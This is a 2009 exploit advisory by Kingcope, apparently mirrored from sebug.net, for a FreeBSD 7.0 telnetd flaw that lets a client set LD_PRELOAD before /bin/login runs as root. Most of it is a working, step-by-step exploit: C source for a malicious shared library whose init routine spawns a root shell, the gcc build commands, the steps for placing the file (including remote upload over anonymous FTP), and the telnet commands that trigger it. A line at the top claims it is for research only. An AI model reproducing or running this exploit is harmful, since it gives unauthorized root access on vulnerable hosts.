FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
2009-02-22 11:27
603 查看
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, what leads to a (possible) remote root hole. The telnet protocol allows to pass environment variables inside the telnet traffic and assign them to the other side of the tcp connection. The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD) environment variables prior to executing /bin/login. So passing an environment variable with the identifier LD_PRELOAD and the value of a precompiled library that is on the filesystem of the victims box that includes malicious code is possible. When /bin/login is executed with the user id and group id 0 ('root') it preloads the library that was set by remote connection through a telnet environment definition and executes it. It is unlikely that this bug can be exploited remotely but is not impossible. An attacker could f.e. upload a malicious library using ftp (including anonymous ftp users), nfs, smb or any other (file) transfer protocol. One scenario to exploit the bug remotely would be a ftp server running beside the telnet daemon serving also anoynmous users with write access. Then the attacker would upload the malicious library and defines the LD_PRELOAD variable to something similar to /var/ftp/mallib.so to gain remote root access. Here comes the actual exploit which can be executed with standard UNIX tools. Paste this into a file using your favorite text editor: ---snip----- # FreeBSD telnetd local/remote privilege escalation/code execution # remote root only when accessible ftp or similar available # tested on FreeBSD 7.0-RELEASE # by Kingcope/2009 #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { FILE *f; setenv("LD_PRELOAD", "", 1); system("echo ALEX-ALEX;/bin/sh"); } ---snip----- Then we compile this stuff. ---snip----- #gcc -o program.o -c program.c -fPIC #gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles ---snip----- Then we copy the file to a known location (local root exploit) ---snip----- #cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 ---snip----- ...or we upload the library through any other available attack vector. After that we telnet to the remote or local FreeBSD telnet daemon with setting the LD_PRELOAD environment variable to the known location as a telnet option before. ---snip----- #telnet >auth disable SRA >environ define LD_PRELOAD /tmp/libno_ex.so.1.0 >open target ---snip----- ALEX-ALEX #ROOTSHELL This will give us an immediate (probably remote) root shell. This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install with telnetd enabled. Other version of FreeBSD may also be affected, OpenBSD and NetBSD where not tested but MAY contain the same bug because of historic reasons. Signed, Kingcope[nikolaos rangos]/2009 http://www.sebug.net/vulndb/4783/
相关文章推荐
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
- MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2
- MS Windows GDI Local Privilege Escalation Exploit
- Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit
- Kingsoft AntiVirus 2012 KisKrnl.sys <= 2011.7.8.913 Local Kernel Mode Privilege Escalation Exploit
- MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)
- Linux Kernel 'MSR' Driver Local Privilege Escalation
- SQL Server 2008 Local Administrator Privilege Escalation
- LINUX KERNEL <= 2.6.36-RC8 RDS PRIVILEGE ESCALATION EXPLOIT
- FreeBSD >= 7.0 local kernel root exploit
- MetaSploit Framework 'pcap_log' Plugin Local Privilege Escalation Vulnerability
- QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)
- Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
- Local Linux Enumeration & Privilege Escalation ...